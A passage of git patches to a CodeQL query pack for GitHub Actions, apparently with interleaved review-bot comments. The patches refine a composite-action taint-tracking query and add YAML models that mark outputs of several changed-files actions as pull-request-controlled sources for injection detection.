@@ -15,18 +15,17 @@ import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow -private class OutputVariableSink extends DataFlow::Node { - OutputVariableSink() { exists(OutputsStmt s | s.getOutputExpr(_) = this.asExpr()) } -} - private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - exists(CompositeActionStmt c | c.getAChildNode*() = source.asExpr()) and - not exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + not source instanceof DataFlow::ParameterNode and + exists(CompositeActionStmt c | c.getAChildNode*() = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof OutputVariableSink } + predicate isSink(DataFlow::Node sink) { + sink instanceof DataFlow::ReturnNode and + exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + } } module MyFlow = TaintTracking::Global; From 68901e252c70cba0add42f17a7074fa29b17f37c Mon Sep 17 00:00:00 2001 
From: jorgectf Date: Tue, 13 Feb 2024 13:18:52 +0100 Subject: [PATCH 025/707] Add some changed-files sources --- .../codeql/actions/dataflow/ExternalFlow.qll | 2 +- ql/lib/ext/REMOVEME.model.yml | 6 --- .../ext/ahmadnassri_action-changed-files.yml | 9 +++++ ql/lib/ext/dorny_paths-filter.yml | 7 ++++ ...> frabert_replace-string-action.model.yml} | 0 ql/lib/ext/jitterbit_get-changed-files.yml | 19 +++++++++ ...actions-find-and-replace-string.model.yml} | 4 +- ql/lib/ext/tj-actions-changed-files.model.yml | 28 ------------- ql/lib/ext/tj-actions_changed-files.model.yml | 39 +++++++++++++++++++ .../ext/tj-actions_verify-changed-files.yml | 7 ++++ 10 files changed, 83 insertions(+), 38 deletions(-) delete mode 100644 ql/lib/ext/REMOVEME.model.yml create mode 100644 ql/lib/ext/ahmadnassri_action-changed-files.yml create mode 100644 ql/lib/ext/dorny_paths-filter.yml rename ql/lib/ext/{frabert-replace-string-action.model.yml => frabert_replace-string-action.model.yml} (100%) create mode 100644 ql/lib/ext/jitterbit_get-changed-files.yml rename ql/lib/ext/{mad9000-actions-find-and-replace-string.model.yml => mad9000_actions-find-and-replace-string.model.yml} (56%) delete mode 100644 ql/lib/ext/tj-actions-changed-files.model.yml create mode 100644 ql/lib/ext/tj-actions_changed-files.model.yml create mode 100644 ql/lib/ext/tj-actions_verify-changed-files.yml diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index b19fbcbaca6d..402372300fbd 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll 
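@@ -22,7 +22,7 @@ predicate sinkModel(string action, string version, string input, string kind) {
 * Fields:
 * - action: Fully-qualified action name (NWO)
 * - version: Either '*' or a specific SHA/Tag
- * - input arg: sink node (prefixed with either `env.` or `input.`)
+ * - input: sink node (prefixed with either `env.` or `input.`)
 * - kind: sink kind
 */
 predicate sinkNode(DataFlow::ExprNode sink, string kind) {
diff --git a/ql/lib/ext/REMOVEME.model.yml b/ql/lib/ext/REMOVEME.model.yml deleted file mode 100644
index b21aa207bb25..000000000000
--- a/ql/lib/ext/REMOVEME.model.yml
+++ /dev/null
@@ -1,6 +0,0 @@
-extensions:
- - addsTo:
- pack: codeql/actions-all
- extensible: sinkModel
- data:
- - [ "FAKE-mad9000/actions-find-and-replace-string", "*", "source", "expression-injection" ]
diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.yml b/ql/lib/ext/ahmadnassri_action-changed-files.yml new file mode 100644
index 000000000000..c5e4df09e3a4
--- /dev/null
+++ b/ql/lib/ext/ahmadnassri_action-changed-files.yml
@@ -0,0 +1,9 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: sourceModel
+ data:
+ - [ "ahmadnassri/action-changed-files", "*", "files", "pull_request", "PR changed files" ]
+ - [ "ahmadnassri/action-changed-files", "*", "files", "pull_request_target", "PR changed files" ]
+ - [ "ahmadnassri/action-changed-files", "*", "json", "pull_request", "PR changed files" ]
+ - [ "ahmadnassri/action-changed-files", "*", "json", "pull_request_target", "PR changed files" ]
diff --git a/ql/lib/ext/dorny_paths-filter.yml b/ql/lib/ext/dorny_paths-filter.yml new file mode 100644
index 000000000000..c78e9e08e708
--- /dev/null
+++ b/ql/lib/ext/dorny_paths-filter.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: sourceModel
+ data:
+ - [ "dorny/paths-filter", "*", "changes", "pull_request", "PR changed files" ]
+ - [ "dorny/paths-filter", "*", "changes", "pull_request_target", "PR changed files" ]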
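Review bot: The new model files are named inconsistently: `ahmadnassri_action-changed-files.yml`, `dorny_paths-filter.yml`, `jitterbit_get-changed-files.yml` and `tj-actions_verify-changed-files.yml` use a bare `.yml` suffix while the renamed and new `tj-actions_changed-files.model.yml`, `mad9000_….model.yml` and `frabert_….model.yml` keep `.model.yml`. If the pack's `dataExtensions` glob is `ext/*.model.yml` (the qlpack is not in this diff), the bare `.yml` files are never loaded and those sources silently do not exist, with no query failing to tell you. Either rename them to `<owner>_<action>.model.yml` or confirm the glob is `ext/**/*.yml` and note the convention in a comment at the top of one of the files.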
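Review bot: Modelling `dorny/paths-filter`'s `changes` output as fork-controlled file paths looks wrong to me: as far as I recall, `changes` is a JSON array of the filter *names* the workflow author declared that matched, so its content is fixed by the workflow and only which names appear is attacker-influenced. The attacker-controlled paths come out of the per-filter `<name>_files` outputs when `list-files` is set, which a model keyed on a fixed output name cannot express. Worth verifying against the action's README and, if confirmed, dropping the two `changes` rows or adding a comment in the file explaining why they are kept.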
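diff --git a/ql/lib/ext/frabert-replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml similarity index 100% rename from ql/lib/ext/frabert-replace-string-action.model.yml rename to ql/lib/ext/frabert_replace-string-action.model.yml
diff --git a/ql/lib/ext/jitterbit_get-changed-files.yml b/ql/lib/ext/jitterbit_get-changed-files.yml new file mode 100644
index 000000000000..8d2798f37367
--- /dev/null
+++ b/ql/lib/ext/jitterbit_get-changed-files.yml
@@ -0,0 +1,19 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: sourceModel
+ data:
+ - [ "jitterbit/get-changed-files", "*", "all", "pull_request", "PR changed files" ]
+ - [ "jitterbit/get-changed-files", "*", "all", "pull_request_target", "PR changed files" ]
+ - [ "jitterbit/get-changed-files", "*", "added", "pull_request", "PR changed files" ]
+ - [ "jitterbit/get-changed-files", "*", "added", "pull_request_target", "PR changed files" ]
+ - [ "jitterbit/get-changed-files", "*", "modified", "pull_request", "PR changed files" ]
+ - [ "jitterbit/get-changed-files", "*", "modified", "pull_request_target", "PR changed files" ]
+ - [ "jitterbit/get-changed-files", "*", "removed", "pull_request", "PR changed files" ]
+ - [ "jitterbit/get-changed-files", "*", "removed", "pull_request_target", "PR changed files" ]
+ - [ "jitterbit/get-changed-files", "*", "renamed", "pull_request", "PR changed files" ]
+ - [ "jitterbit/get-changed-files", "*", "renamed", "pull_request_target", "PR changed files" ]
+ - [ "jitterbit/get-changed-files", "*", "added_modified", "pull_request", "PR changed files" ]
+ - [ "jitterbit/get-changed-files", "*", "added_modified", "pull_request_target", "PR changed files" ]
+ - [ "jitterbit/get-changed-files", "*", "deleted", "pull_request", "PR changed files" ]
+ - [ "jitterbit/get-changed-files", "*", "deleted", "pull_request_target", "PR changed files" ]
\ No newline at end of file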
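diff --git a/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml similarity index 56% rename from ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml rename to ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
index 28517f445682..a9db2714746f 100644
--- a/ql/lib/ext/mad9000-actions-find-and-replace-string.model.yml
+++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
@@ -4,6 +4,4 @@ extensions:
 extensible: summaryModel
 data:
 - [ "mad9000/actions-find-and-replace-string", "*", "source", "value", "taint" ]
- - [ "mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint" ]
- - [ "frabert/replace-string-action", "*", "string", "replaced", "taint" ]
- - [ "frabert/replace-string-action", "*", "replace-with", "replaced", "taint" ]
+ - [ "mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint" ]
\ No newline at end of file
diff --git a/ql/lib/ext/tj-actions-changed-files.model.yml b/ql/lib/ext/tj-actions-changed-files.model.yml deleted file mode 100644
index a3f687a0611c..000000000000
--- a/ql/lib/ext/tj-actions-changed-files.model.yml
+++ /dev/null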
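@@ -1,28 +0,0 @@
-extensions:
- - addsTo:
- pack: codeql/actions-all
- extensible: sourceModel
- data:
- - [ "tj-actions/changed-files", "*", "added_files", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "all_changed_files", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "all_modified_files", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "any_changed", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "any_deleted", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "any_modified", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "changed_keys", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "copied_files", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "deleted_files", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "modified_files", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "modified_keys", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "only_changed", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "only_deleted", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "only_modified", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "other_changed_files", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "other_deleted_files", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "other_modified_files", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "renamed_files", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "type_changed_files", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "unknown_files", "*", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "unmerged_files", "*", "PR changed files" ]
diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml new file mode 100644
index 000000000000..8e0189dcb676
--- /dev/null
+++ b/ql/lib/ext/tj-actions_changed-files.model.yml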
@@ -0,0 +1,39 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: sourceModel
+ data:
+ - [ "tj-actions/changed-files", "*", "added_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "added_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "copied_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "copied_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "deleted_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "deleted_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "modified_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "modified_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "renamed_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "renamed_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "type_changed_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "type_changed_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "unmerged_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "unmerged_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "unknown_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "unknown_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request", "PR changed files" ]
+ - [
"tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "all_changed_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "all_changed_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "other_changed_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "other_changed_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "all_modified_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "all_modified_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "other_modified_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "other_modified_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "other_deleted_files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "other_deleted_files", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "modified_keys", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "modified_keys", "pull_request_target", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "changed_keys", "pull_request", "PR changed files" ]
+ - [ "tj-actions/changed-files", "*", "changed_keys", "pull_request_target", "PR changed files" ]
\ No newline at end of file
diff --git a/ql/lib/ext/tj-actions_verify-changed-files.yml b/ql/lib/ext/tj-actions_verify-changed-files.yml
new file mode 100644
index 000000000000..55aebb0d34a4
--- /dev/null
+++ b/ql/lib/ext/tj-actions_verify-changed-files.yml
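Review bot: The file does not record why the six boolean outputs present in the deleted `*` version (`any_changed`, `any_deleted`, `any_modified`, `only_changed`, `only_deleted`, `only_modified`) are no longer listed, nor why the trigger column went from `*` to only `pull_request` and `pull_request_target`. A YAML comment above `data:` such as `# Only outputs that carry file names or keys are modeled; the boolean any_*/only_* outputs are intentionally omitted.` would stop the next contributor from re-adding them. Narrowing from `*` also means a workflow that runs this action under any other trigger no longer has these outputs treated as sources; I cannot tell from this file how the trigger column is matched, so if that narrowing is deliberate it belongs in the same comment. The file also ends without a trailing newline.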
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: codeql/actions-all
+ extensible: sourceModel
+ data:
+ - [ "tj-actions/verify-changed-files", "*", "changed-files", "pull_request", "PR changed files" ]
+ - [ "tj-actions/verify-changed-files", "*", "changed-files", "pull_request_target", "PR changed files" ]
From fa91837f63dbd6cd399066fa386c93b0bddd5309 Mon Sep 17 00:00:00 2001
From: jorgectf Date: Tue, 13 Feb 2024 13:22:18 +0100 Subject: [PATCH 026/707] Trim yaml --- .../ext/ahmadnassri_action-changed-files.yml | 8 +-- ql/lib/ext/dorny_paths-filter.yml | 4 +- .../frabert_replace-string-action.model.yml | 4 +- ql/lib/ext/jitterbit_get-changed-files.yml | 28 ++++---- ..._actions-find-and-replace-string.model.yml | 4 +- ql/lib/ext/tj-actions_changed-files.model.yml | 68 +++++++++---------- .../ext/tj-actions_verify-changed-files.yml | 4 +- 7 files changed, 60 insertions(+), 60 deletions(-)
diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.yml b/ql/lib/ext/ahmadnassri_action-changed-files.yml
index c5e4df09e3a4..bd86b3f843e1 100644
--- a/ql/lib/ext/ahmadnassri_action-changed-files.yml
+++ b/ql/lib/ext/ahmadnassri_action-changed-files.yml
@@ -3,7 +3,7 @@ extensions:
pack: codeql/actions-all
extensible: sourceModel
data:
- - [ "ahmadnassri/action-changed-files", "*", "files", "pull_request", "PR changed files" ]
- - [ "ahmadnassri/action-changed-files", "*", "files", "pull_request_target", "PR changed files" ]
- - [ "ahmadnassri/action-changed-files", "*", "json", "pull_request", "PR changed files" ]
- - [ "ahmadnassri/action-changed-files", "*", "json", "pull_request_target", "PR changed files" ]
+ - ["ahmadnassri/action-changed-files", "*", "files", "pull_request", "PR changed files"]
+ - ["ahmadnassri/action-changed-files", "*", "files", "pull_request_target", "PR changed files"]
+ - ["ahmadnassri/action-changed-files", "*", "json", "pull_request", "PR changed files"]
+ - ["ahmadnassri/action-changed-files", "*", "json", "pull_request_target", "PR changed files"]
diff --git a/ql/lib/ext/dorny_paths-filter.yml b/ql/lib/ext/dorny_paths-filter.yml
index c78e9e08e708..c9cdd2dbcc0f 100644
--- a/ql/lib/ext/dorny_paths-filter.yml
+++ b/ql/lib/ext/dorny_paths-filter.yml
@@ -3,5 +3,5 @@ extensions:
pack: codeql/actions-all
extensible: sourceModel
data:
- - [ "dorny/paths-filter", "*", "changes", "pull_request", "PR changed files" ]
- - [ "dorny/paths-filter", "*", "changes", "pull_request_target", "PR changed files" ]
+ - ["dorny/paths-filter", "*", "changes", "pull_request", "PR changed files"]
+ - ["dorny/paths-filter", "*", "changes", "pull_request_target", "PR changed files"]
diff --git a/ql/lib/ext/frabert_replace-string-action.model.yml b/ql/lib/ext/frabert_replace-string-action.model.yml
index e211fe2b69c7..76ce81b394e4 100644
--- a/ql/lib/ext/frabert_replace-string-action.model.yml
+++ b/ql/lib/ext/frabert_replace-string-action.model.yml
@@ -3,5 +3,5 @@ extensions:
pack: codeql/actions-all
extensible: summaryModel
data:
- - [ "frabert/replace-string-action", "*", "string", "replaced", "taint" ]
- - [ "frabert/replace-string-action", "*", "replace-with", "replaced", "taint" ]
+ - ["frabert/replace-string-action", "*", "string", "replaced", "taint"]
+ - ["frabert/replace-string-action", "*", "replace-with", "replaced", "taint"]
diff --git a/ql/lib/ext/jitterbit_get-changed-files.yml b/ql/lib/ext/jitterbit_get-changed-files.yml
index 8d2798f37367..198e60d42458 100644
--- a/ql/lib/ext/jitterbit_get-changed-files.yml
+++ b/ql/lib/ext/jitterbit_get-changed-files.yml
@@ -3,17 +3,17 @@ extensions:
pack: codeql/actions-all
extensible: sourceModel
data:
- - [ "jitterbit/get-changed-files", "*", "all", "pull_request", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "all", "pull_request_target", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "added", "pull_request", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "added", "pull_request_target", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "modified", "pull_request", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "modified", "pull_request_target", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "removed", "pull_request", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "removed", "pull_request_target", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "renamed", "pull_request", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "renamed", "pull_request_target", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "added_modified", "pull_request", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "added_modified", "pull_request_target", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "deleted", "pull_request", "PR changed files" ]
- - [ "jitterbit/get-changed-files", "*", "deleted", "pull_request_target", "PR changed files" ]
\ No newline at end of file
+ - ["jitterbit/get-changed-files", "*", "all", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "all", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "added", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "added", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "modified", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "modified", "pull_request_target", "PR changed files"]
+ -
["jitterbit/get-changed-files", "*", "removed", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "removed", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "renamed", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "renamed", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "added_modified", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "added_modified", "pull_request_target", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "deleted", "pull_request", "PR changed files"]
+ - ["jitterbit/get-changed-files", "*", "deleted", "pull_request_target", "PR changed files"]
\ No newline at end of file
diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
index a9db2714746f..46a577d2f7e2 100644
--- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
+++ b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml
@@ -3,5 +3,5 @@ extensions:
pack: codeql/actions-all
extensible: summaryModel
data:
- - [ "mad9000/actions-find-and-replace-string", "*", "source", "value", "taint" ]
- - [ "mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint" ]
\ No newline at end of file
+ - ["mad9000/actions-find-and-replace-string", "*", "source", "value", "taint"]
+ - ["mad9000/actions-find-and-replace-string", "*", "replace", "value", "taint"]
\ No newline at end of file
diff --git a/ql/lib/ext/tj-actions_changed-files.model.yml b/ql/lib/ext/tj-actions_changed-files.model.yml
index 8e0189dcb676..1ef816727e1f 100644
--- a/ql/lib/ext/tj-actions_changed-files.model.yml
+++ b/ql/lib/ext/tj-actions_changed-files.model.yml
@@ -3,37 +3,37 @@ extensions:
pack: codeql/actions-all
extensible: sourceModel
data:
- - [ "tj-actions/changed-files", "*", "added_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "added_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "copied_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "copied_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "deleted_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "deleted_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "modified_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "modified_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "renamed_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "renamed_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "type_changed_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "type_changed_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "unmerged_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "unmerged_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "unknown_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "unknown_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files",
"*", "all_changed_and_modified_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "all_changed_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "all_changed_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "other_changed_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "other_changed_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "all_modified_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "all_modified_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "other_modified_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "other_modified_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "other_deleted_files", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "other_deleted_files", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "modified_keys", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "modified_keys", "pull_request_target", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "changed_keys", "pull_request", "PR changed files" ]
- - [ "tj-actions/changed-files", "*", "changed_keys", "pull_request_target", "PR changed files" ]
\ No newline at end of file
+ - ["tj-actions/changed-files", "*", "added_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "added_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "copied_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "copied_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "deleted_files", "pull_request", "PR changed files"]
+ -
["tj-actions/changed-files", "*", "deleted_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "modified_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "modified_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "renamed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "renamed_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "all_old_new_renamed_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "type_changed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "type_changed_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "unmerged_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "unmerged_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "unknown_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "unknown_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "all_changed_and_modified_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "all_changed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "all_changed_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "other_changed_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "other_changed_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "all_modified_files", "pull_request", "PR changed files"]
+ -
["tj-actions/changed-files", "*", "all_modified_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "other_modified_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "other_modified_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "other_deleted_files", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "other_deleted_files", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "modified_keys", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "modified_keys", "pull_request_target", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "changed_keys", "pull_request", "PR changed files"]
+ - ["tj-actions/changed-files", "*", "changed_keys", "pull_request_target", "PR changed files"]
\ No newline at end of file
diff --git a/ql/lib/ext/tj-actions_verify-changed-files.yml b/ql/lib/ext/tj-actions_verify-changed-files.yml
index 55aebb0d34a4..076ecff353c4 100644
--- a/ql/lib/ext/tj-actions_verify-changed-files.yml
+++ b/ql/lib/ext/tj-actions_verify-changed-files.yml
@@ -3,5 +3,5 @@ extensions:
pack: codeql/actions-all
extensible: sourceModel
data:
- - [ "tj-actions/verify-changed-files", "*", "changed-files", "pull_request", "PR changed files" ]
- - [ "tj-actions/verify-changed-files", "*", "changed-files", "pull_request_target", "PR changed files" ]
+ - ["tj-actions/verify-changed-files", "*", "changed-files", "pull_request", "PR changed files"]
+ - ["tj-actions/verify-changed-files", "*", "changed-files", "pull_request_target", "PR changed files"]
From 6627a858e379259e0f9dca2e1fbc54b0fbe5d736 Mon Sep 17 00:00:00 2001
From: jorgectf Date: Tue, 13 Feb 2024 13:24:25 +0100 Subject: [PATCH 027/707] Suffix with `.model` --- ...anged-files.yml => ahmadnassri_action-changed-files.model.yml} | 0 .../ext/{dorny_paths-filter.yml => dorny_paths-filter.model.yml} | 0 ...et-changed-files.yml => jitterbit_get-changed-files.model.yml} | 0 ...hanged-files.yml => tj-actions_verify-changed-files.model.yml} | 0 4 files changed, 0 insertions(+), 0 deletions(-) rename ql/lib/ext/{ahmadnassri_action-changed-files.yml => ahmadnassri_action-changed-files.model.yml} (100%) rename ql/lib/ext/{dorny_paths-filter.yml => dorny_paths-filter.model.yml} (100%) rename ql/lib/ext/{jitterbit_get-changed-files.yml => jitterbit_get-changed-files.model.yml} (100%) rename ql/lib/ext/{tj-actions_verify-changed-files.yml => tj-actions_verify-changed-files.model.yml} (100%) diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml similarity index 100% rename from ql/lib/ext/ahmadnassri_action-changed-files.yml rename to 